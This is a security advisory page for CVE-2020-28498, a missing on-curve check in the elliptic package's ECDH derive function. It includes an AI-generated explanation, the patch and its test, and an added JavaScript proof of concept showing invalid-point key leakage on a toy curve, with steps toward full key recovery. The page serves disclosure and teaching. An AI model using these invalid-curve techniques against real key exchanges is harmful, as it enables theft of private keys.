Cryptographic Issues
Description
The package elliptic before 6.5.4 is vulnerable to Cryptographic Issues via the secp256k1 implementation in elliptic/ec/key.js. There is no check to confirm that the public key point passed into the derive function actually exists on the secp256k1 curve. This results in the potential for the private key used in this implementation to be revealed after a number of ECDH operations are performed.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The elliptic package before 6.5.4 fails to validate public key points on the secp256k1 curve, allowing ECDH twist attacks that may leak the private key.
Vulnerability Overview
The elliptic npm package, versions prior to 6.5.4, contains a cryptographic flaw in its ECDH implementation for the secp256k1 curve. In elliptic/ec/key.js, the derive function accepts a public key point without first verifying that the point actually lies on the curve. This omission means an attacker can supply a point that is not on secp256k1 at all. Because the short-Weierstrass addition and doubling formulas never use the curve constant b, such a point (x, y) is processed as if it were a point on the related curve y^2 = x^3 + b' with b' = y^2 - x^3, and the attacker can choose (x, y) so that it has small order on that curve; the attack is commonly called a twist attack [1][2].
Attack Vector and Requirements
To exploit this vulnerability, an attacker must be able to provide a crafted public key to a victim's ECDH operation and learn something that depends on the resulting shared secret (the secret itself, a MAC or ciphertext keyed from it, or merely whether the operation succeeded). No special authentication or network position is required beyond the ability to substitute a public key during a key exchange or a similar protocol step. The lack of validation allows the use of points from curves related to secp256k1, including its quadratic twist, on which subgroups of small order exist [3][4].
Impact
If an attacker repeatedly supplies such invalid points, and the victim performs several ECDH derivations with them, the victim's private key can be recovered. Each derivation with a point of small order r reveals the private key modulo r, up to sign because only the x-coordinate is used, at the cost of at most r guesses; combining the residues obtained from points of different small orders recovers the whole key. This is a classic twist attack on elliptic curve Diffie-Hellman, enabling the attacker to compromise the confidentiality of all past and future communications protected by that key [1][2][3].
Mitigation
Users should upgrade the elliptic package to version 6.5.4 or later. The fix was introduced in commit 441b7428, which adds a validation check in the derive function: it now asserts that the public key point lies on the curve before performing the multiplication [4]. For secp256k1, whose cofactor is 1, an on-curve check is sufficient to rule out small-order points. Callers that cannot upgrade immediately can apply the same check themselves by calling the public point's validate() method before derive, as the fix does, but upgrading is the reliable remediation.
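The following is an added example written for this page to make the mechanism described in the overview, attack and mitigation sections concrete; it is not code from the elliptic project and does not use elliptic's API. It implements its own affine short-Weierstrass arithmetic over BigInt, uses the standard secp256k1 parameters, the off-curve point {x: 14, y: 16} from the fix's test, a constructed private key PRIV, and a constructed toy curve over F_37 with secp256k1's shape (a = 0, b = 7) so that point orders are small enough to scan. validate=false in derive() models elliptic before 6.5.4; validate=true models the 6.5.4 check.

```javascript
// Added example, not elliptic's code: why derive() must reject off-curve points. Affine
// short-Weierstrass arithmetic over BigInt; add() uses the curve constant a but never b, so an
// off-curve (x, y) is silently processed on y^2 = x^3 + a*x + b' with b' = y^2 - x^3 - a*x,
// a curve the attacker picks by picking (x, y), possibly one with tiny subgroups.
const mod = (v, p) => ((v % p) + p) % p;
function inv(v, p) {                                  // extended Euclid; p prime, v != 0 mod p
  let [r0, r1, s0, s1] = [mod(v, p), p, 1n, 0n];
  while (r1 !== 0n) {
    const q = r0 / r1;
    [r0, r1] = [r1, r0 - q * r1];
    [s0, s1] = [s1, s0 - q * s1];
  }
  if (r0 !== 1n) throw new Error('no inverse');
  return mod(s0, p);
}
function add(P, Q, a, p) {                            // null is the point at infinity
  if (P === null) return Q;
  if (Q === null) return P;
  let lam;
  if (P.x === Q.x) {
    if (mod(P.y + Q.y, p) === 0n) return null;        // Q == -P
    lam = mod((3n * P.x * P.x + a) * inv(2n * P.y, p), p);  // tangent slope: no b here
  } else {
    lam = mod((Q.y - P.y) * inv(Q.x - P.x, p), p);    // chord slope: no b here either
  }
  const x = mod(lam * lam - P.x - Q.x, p);
  return { x, y: mod(lam * (P.x - x) - P.y, p) };
}
function mul(k, P, a, p) {                            // double-and-add, k >= 0
  let R = null, Q = P;
  for (let e = k; e > 0n; e >>= 1n) {
    if (e & 1n) R = add(R, Q, a, p);
    Q = add(Q, Q, a, p);
  }
  return R;
}
const impliedB = (P, c) => mod(P.y * P.y - P.x ** 3n - c.a * P.x, c.p);
const isOnCurve = (P, c) => P !== null && impliedB(P, c) === mod(c.b, c.p);
// ECDH as elliptic does it: x-coordinate of priv * pub. validate=false models elliptic before
// 6.5.4; validate=true models the 6.5.4 check and reuses the fix's error text.
function derive(priv, pub, c, validate = true) {
  if (validate && !isOnCurve(pub, c)) throw new Error('public point not validated');
  const R = mul(priv, pub, c.a, c.p);
  if (R === null) throw new Error('shared point at infinity');
  return R.x;
}
function pointOrder(P, a, p) {                        // by repeated addition: toy fields only
  let k = 1n, Q = P;
  while (Q !== null) { Q = add(Q, P, a, p); k++; }
  return k;
}
// Attacker preparation: find the off-curve point (on a non-singular b' curve) of smallest order.
function findSmallOrderPoint(c) {
  let best = null;
  for (let x = 0n; x < c.p; x++) for (let y = 1n; y < c.p; y++) {
    const P = { x, y }, bPrime = impliedB(P, c);
    if (isOnCurve(P, c) || mod(4n * c.a ** 3n + 27n * bPrime * bPrime, c.p) === 0n) continue;
    const r = pointOrder(P, c.a, c.p);
    if (best === null || r < best.r) best = { P, r, bPrime };
  }
  return best;
}
// Attacker recovery: only k = +-d (mod r) give x(k*P) == shared x, so r guesses narrow d mod r
// to two values. k = 0 matches a derive() that failed on the point at infinity: errors leak too.
function recoverDModR(secretX, P, r, c) {
  const candidates = [];
  for (let k = 0n; k < r; k++) {
    const Q = mul(k, P, c.a, c.p);
    if ((Q === null ? null : Q.x) === secretX) candidates.push(k);
  }
  return candidates;
}
function smallSubgroupLeak(c, d) {                    // one exchange with an unpatched victim
  const weak = findSmallOrderPoint(c);
  let secretX = null;
  try { secretX = derive(d, weak.P, c, false); } catch (e) { /* victim errored: still an oracle */ }
  return { d, r: weak.r, bPrime: weak.bPrime, candidates: recoverDModR(secretX, weak.P, weak.r, c) };
}
// Standard secp256k1 parameters; the fix's test point {x: 14, y: 16}; a constructed private key;
// and a constructed toy curve with secp256k1's shape (a = 0, b = 7) over F_37, small enough to scan.
const SECP256K1 = {
  p: 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2Fn, a: 0n, b: 7n,
  n: 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141n,
  G: { x: 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798n,
       y: 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8n },
};
const BAD_POINT = { x: 14n, y: 16n };
const PRIV = 0x1a2b3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d5e6f708192a3b4c5d6e7f809n;
const TOY = { p: 37n, a: 0n, b: 7n };
const shared = mul(PRIV, BAD_POINT, SECP256K1.a, SECP256K1.p);
console.log('bad point on secp256k1?', isOnCurve(BAD_POINT, SECP256K1), '| PRIV * bad point on the b\' curve?',
  isOnCurve(shared, { p: SECP256K1.p, a: 0n, b: impliedB(BAD_POINT, SECP256K1) }));
console.log('toy curve, one exchange:', smallSubgroupLeak(TOY, 29n));
try { derive(PRIV, BAD_POINT, SECP256K1); } catch (e) { console.log('6.5.4 behaviour:', e.message); }
```

Run it with node. The first line shows that the fix's bad point is not on secp256k1, yet multiplying it by the private key lands on the curve y^2 = x^3 + b' that the point itself defines; the second shows that on the toy curve a single exchange with an unpatched victim narrows d mod r to at most two values. Repeating that with points of pairwise coprime small orders and combining the residues with the Chinese remainder theorem, testing each sign combination against the victim's known public key, recovers d; the last line shows the on-curve check that stops the attack at its first step.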
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| elliptic (npm) | < 6.5.4 | 6.5.4 |
Affected products
- elliptic/elliptic
Patches
441b7428b0e8ec: validate that a point before deriving keys
2 files changed · +17 −0
lib/elliptic/ec/key.js+3 −0 modified@@ -100,6 +100,9 @@ KeyPair.prototype._importPublic = function _importPublic(key, enc) { // ECDH KeyPair.prototype.derive = function derive(pub) { + if(!pub.validate()) { + assert(pub.validate(), 'public point not validated'); + } return pub.mul(this.priv).getX(); };
test/ecdh-test.js+14 −0 modified@@ -27,3 +27,17 @@ describe('ECDH', function() { test('ed25519'); test('secp256k1'); }); + +describe('ECDH twist attack', () => { + it('should be able to prevent a twist attack for secp256k1', () => { + var bobEcdh = new elliptic.ec('secp256k1'); + var malloryEcdh = new elliptic.ec('secp256k1'); + var bob = bobEcdh.genKeyPair(); + // This is a bad point that shouldn't be able to be passed to derive. + // If a bad point can be passed it's possible to perform a twist attack. + var mallory = malloryEcdh.keyFromPublic({ x: 14, y: 16 }); + assert.throws(function () { + bob.derive(mallory.getPublic()); + }); + }); +});
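Review bot: in the derive hunk of lib/elliptic/ec/key.js, the inner `assert(pub.validate(), 'public point not validated');` is only reached when the surrounding `if(!pub.validate())` has already found the point invalid, so the point is validated twice and the assert condition is always false at that spot; collapse the guard to a single `assert(pub.validate(), 'public point not validated');` before `return pub.mul(this.priv).getX();`. The hunk also leans entirely on what validate() checks, which is not visible here; since the test file below exercises ed25519 as well as secp256k1, a comment stating that validate() rules out low-order points on every curve derive() supports (or an explicit order check where it does not) would make the guarantee reviewable.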
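Review bot: the new test in test/ecdh-test.js asserts only that derive throws for one hard-coded off-curve secp256k1 point, so any failure inside derive would make it pass; pass the expected message, `assert.throws(function () { bob.derive(mallory.getPublic()); }, /public point not validated/);`, add a positive case showing that a valid public point still derives, and consider covering the other curves the file already iterates (`test('ed25519');` above) with an invalid point each. Minor: the existing tests use `function () {}` callbacks while the new block mixes in arrow functions.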
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-r9p9-mrjm-926w (GHSA, ADVISORY)
- nvd.nist.gov/vuln/detail/CVE-2020-28498 (GHSA, ADVISORY)
- github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md (GHSA, x_refsource_CONFIRM, WEB)
- github.com/indutny/elliptic/commit/441b7428b0e8f6636c42118ad2aaa186d3c34c3f (GHSA, x_refsource_CONFIRM, WEB)
- github.com/indutny/elliptic/pull/244/commits (GHSA, WEB)
- snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1069836 (GHSA, x_refsource_CONFIRM, WEB)
- snyk.io/vuln/SNYK-JS-ELLIPTIC-1064899 (GHSA, x_refsource_CONFIRM, WEB)
- www.npmjs.com/package/elliptic (GHSA, WEB)